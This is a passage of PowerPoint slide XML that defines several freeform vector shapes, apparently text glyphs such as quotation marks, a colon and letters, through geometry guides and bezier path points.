                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 36 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 169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5" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="51" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="44" y="167"/>
                    <a:pt x="36" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="73" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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3" name="Freeform 964">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8063B952-F93F-42C6-AA48-CB3DA8C5C896}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId140"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5070476" y="2317751"/>
              <a:ext cx="46038" cy="50800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 136"/>
                <a:gd name="T1" fmla="*/ 27 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 136"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 2 w 136"/>
                <a:gd name="T5" fmla="*/ 27 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 136"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 136"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 40 w 136"/>
                <a:gd name="T11" fmla="*/ 129 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 136"/>
                <a:gd name="T13" fmla="*/ 27 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 136"/>
                <a:gd name="T15" fmla="*/ 27 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 136"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 90 w 136"/>
                <a:gd name="T19" fmla="*/ 27 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 136"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 136"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 128 w 136"/>
                <a:gd name="T25" fmla="*/ 129 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 136"/>
                <a:gd name="T27" fmla="*/ 2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47">
                  <a:moveTo>
                    <a:pt x="46" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="4"/>
                    <a:pt x="31" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="2" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="40" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="27"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="4"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="88" y="6"/>
                    <a:pt x="90" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="128" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134" y="2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4" name="Freeform 965">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CE8A822-4B63-47E0-8CB5-1B815EB8B332}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId141"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5173663" y="2351088"/>
              <a:ext cx="20638" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 215"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 215"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 30 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 215"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 32 h 215"/>
                <a:gd name="T10" fmla="*/ 62 w 62"/>
                <a:gd name="T11" fmla="*/ 184 h 215"/>
                <a:gd name="T12" fmla="*/ 31 w 62"/>
                <a:gd name="T13" fmla="*/ 153 h 215"/>
                <a:gd name="T14" fmla="*/ 0 w 62"/>
                <a:gd name="T15" fmla="*/ 184 h 215"/>
                <a:gd name="T16" fmla="*/ 30 w 62"/>
                <a:gd name="T17" fmla="*/ 215 h 215"/>
                <a:gd name="T18" fmla="*/ 62 w 62"/>
                <a:gd name="T19" fmla="*/ 184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15">
                  <a:moveTo>
                    <a:pt x="62" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="30" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="63"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="62" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="166"/>
                    <a:pt x="47" y="153"/>
                    <a:pt x="31" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="153"/>
                    <a:pt x="0" y="168"/>
                    <a:pt x="0" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="202"/>
                    <a:pt x="15" y="215"/>
                    <a:pt x="30" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="215"/>
                    <a:pt x="62" y="200"/>
                    <a:pt x="62" y="18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5" name="Freeform 966">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A2AB29-48EA-4654-80B5-2AEFCB50D7C9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId142"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5249863" y="2317751"/>
              <a:ext cx="47625" cy="50800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 136"/>
                <a:gd name="T1" fmla="*/ 27 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 136"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 2 w 136"/>
                <a:gd name="T5" fmla="*/ 27 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 136"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 136"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 40 w 136"/>
                <a:gd name="T11" fmla="*/ 129 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 136"/>
                <a:gd name="T13" fmla="*/ 27 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 136"/>
                <a:gd name="T15" fmla="*/ 27 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 136"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 90 w 136"/>
                <a:gd name="T19" fmla="*/ 27 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 136"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 136"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 128 w 136"/>
                <a:gd name="T25" fmla="*/ 129 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 136"/>
                <a:gd name="T27" fmla="*/ 2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47">
                  <a:moveTo>
                    <a:pt x="46" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="4"/>
                    <a:pt x="31" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="2" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="40" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="27"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="4"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="88" y="6"/>
                    <a:pt x="90" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="128" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134" y="2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6" name="Freeform 967">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B356BCE2-E742-4BBA-B91E-51171E78B4AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId143"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5324476" y="2317751"/>
              <a:ext cx="80963" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 144 w 235"/>
                <a:gd name="T1" fmla="*/ 19 h 310"/>
                <a:gd name="T2" fmla="*/ 117 w 235"/>
                <a:gd name="T3" fmla="*/ 0 h 310"/>
                <a:gd name="T4" fmla="*/ 91 w 235"/>
                <a:gd name="T5" fmla="*/ 18 h 310"/>
                <a:gd name="T6" fmla="*/ 30 w 235"/>
                <a:gd name="T7" fmla="*/ 280 h 310"/>
                <a:gd name="T8" fmla="*/ 9 w 235"/>
                <a:gd name="T9" fmla="*/ 281 h 310"/>
                <a:gd name="T10" fmla="*/ 0 w 235"/>
                <a:gd name="T11" fmla="*/ 295 h 310"/>
                <a:gd name="T12" fmla="*/ 22 w 235"/>
                <a:gd name="T13" fmla="*/ 310 h 310"/>
                <a:gd name="T14" fmla="*/ 73 w 235"/>
                <a:gd name="T15" fmla="*/ 310 h 310"/>
                <a:gd name="T16" fmla="*/ 94 w 235"/>
                <a:gd name="T17" fmla="*/ 295 h 310"/>
                <a:gd name="T18" fmla="*/ 66 w 235"/>
                <a:gd name="T19" fmla="*/ 280 h 310"/>
                <a:gd name="T20" fmla="*/ 77 w 235"/>
                <a:gd name="T21" fmla="*/ 228 h 310"/>
                <a:gd name="T22" fmla="*/ 158 w 235"/>
                <a:gd name="T23" fmla="*/ 228 h 310"/>
                <a:gd name="T24" fmla="*/ 169 w 235"/>
                <a:gd name="T25" fmla="*/ 280 h 310"/>
                <a:gd name="T26" fmla="*/ 141 w 235"/>
                <a:gd name="T27" fmla="*/ 295 h 310"/>
                <a:gd name="T28" fmla="*/ 162 w 235"/>
                <a:gd name="T29" fmla="*/ 310 h 310"/>
                <a:gd name="T30" fmla="*/ 213 w 235"/>
                <a:gd name="T31" fmla="*/ 310 h 310"/>
                <a:gd name="T32" fmla="*/ 235 w 235"/>
                <a:gd name="T33" fmla="*/ 295 h 310"/>
                <a:gd name="T34" fmla="*/ 226 w 235"/>
                <a:gd name="T35" fmla="*/ 281 h 310"/>
                <a:gd name="T36" fmla="*/ 205 w 235"/>
                <a:gd name="T37" fmla="*/ 280 h 310"/>
                <a:gd name="T38" fmla="*/ 144 w 235"/>
                <a:gd name="T39" fmla="*/ 19 h 310"/>
                <a:gd name="T40" fmla="*/ 117 w 235"/>
                <a:gd name="T41" fmla="*/ 40 h 310"/>
                <a:gd name="T42" fmla="*/ 118 w 235"/>
                <a:gd name="T43" fmla="*/ 40 h 310"/>
                <a:gd name="T44" fmla="*/ 150 w 235"/>
                <a:gd name="T45" fmla="*/ 198 h 310"/>
                <a:gd name="T46" fmla="*/ 85 w 235"/>
                <a:gd name="T47" fmla="*/ 198 h 310"/>
                <a:gd name="T48" fmla="*/ 117 w 235"/>
                <a:gd name="T49" fmla="*/ 4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 h="310">
                  <a:moveTo>
                    <a:pt x="144" y="19"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="0"/>
                    <a:pt x="133" y="0"/>
                    <a:pt x="117" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="95" y="0"/>
                    <a:pt x="91" y="18"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="30" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="280"/>
                    <a:pt x="12" y="280"/>
                    <a:pt x="9" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="284"/>
                    <a:pt x="0" y="289"/>
                    <a:pt x="0" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="310"/>
                    <a:pt x="13" y="310"/>
                    <a:pt x="22" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="73" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="310"/>
                    <a:pt x="94" y="310"/>
                    <a:pt x="94" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="280"/>
                    <a:pt x="84" y="280"/>
                    <a:pt x="66" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="280"/>
                    <a:pt x="141" y="280"/>
                    <a:pt x="141" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="310"/>
                    <a:pt x="153" y="310"/>
                    <a:pt x="162" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="213" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="310"/>
                    <a:pt x="235" y="310"/>
                    <a:pt x="235" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="289"/>
                    <a:pt x="232" y="284"/>
                    <a:pt x="226" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="280"/>
                    <a:pt x="212" y="280"/>
                    <a:pt x="205" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="144" y="19"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="117" y="40"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="118" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117" y="4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7" name="Freeform 968">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56965AC4-03F4-44D0-B275-C4D968FE8E8B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId144"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5419726" y="2319338"/>
              <a:ext cx="69850" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 119 w 204"/>
                <a:gd name="T1" fmla="*/ 20 h 304"/>
                <a:gd name="T2" fmla="*/ 100 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 304"/>
                <a:gd name="T4" fmla="*/ 21 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 304"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 15 h 304"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 30 h 304"/>
                <a:gd name="T10" fmla="*/ 85 w 204"/>
                <a:gd name="T11" fmla="*/ 30 h 304"/>
                <a:gd name="T12" fmla="*/ 85 w 204"/>
                <a:gd name="T13" fmla="*/ 274 h 304"/>
                <a:gd name="T14" fmla="*/ 21 w 204"/>
                <a:gd name="T15" fmla="*/ 274 h 304"/>
                <a:gd name="T16" fmla="*/ 0 w 204"/>
                <a:gd name="T17" fmla="*/ 289 h 304"/>
                <a:gd name="T18" fmla="*/ 20 w 204"/>
                <a:gd name="T19" fmla="*/ 304 h 304"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 304 h 304"/>
                <a:gd name="T22" fmla="*/ 204 w 204"/>
                <a:gd name="T23" fmla="*/ 289 h 304"/>
                <a:gd name="T24" fmla="*/ 184 w 204"/>
                <a:gd name="T25" fmla="*/ 274 h 304"/>
                <a:gd name="T26" fmla="*/ 119 w 204"/>
                <a:gd name="T27" fmla="*/ 274 h 304"/>
                <a:gd name="T28" fmla="*/ 119 w 204"/>
                <a:gd name="T29" fmla="*/ 2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304">
                  <a:moveTo>
                    <a:pt x="119" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="5"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="100" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="85" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="304"/>
                    <a:pt x="204" y="304"/>
                    <a:pt x="204" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="274"/>
                    <a:pt x="192" y="274"/>
                    <a:pt x="184" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="119" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="2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8" name="Freeform 969">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{012F571C-9826-4BEA-9A6F-5AF1852B66A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId145"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5513388" y="2319338"/>
              <a:ext cx="65088" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 24 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 24 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 167 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 167 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 90 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 65 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 90 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="24" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
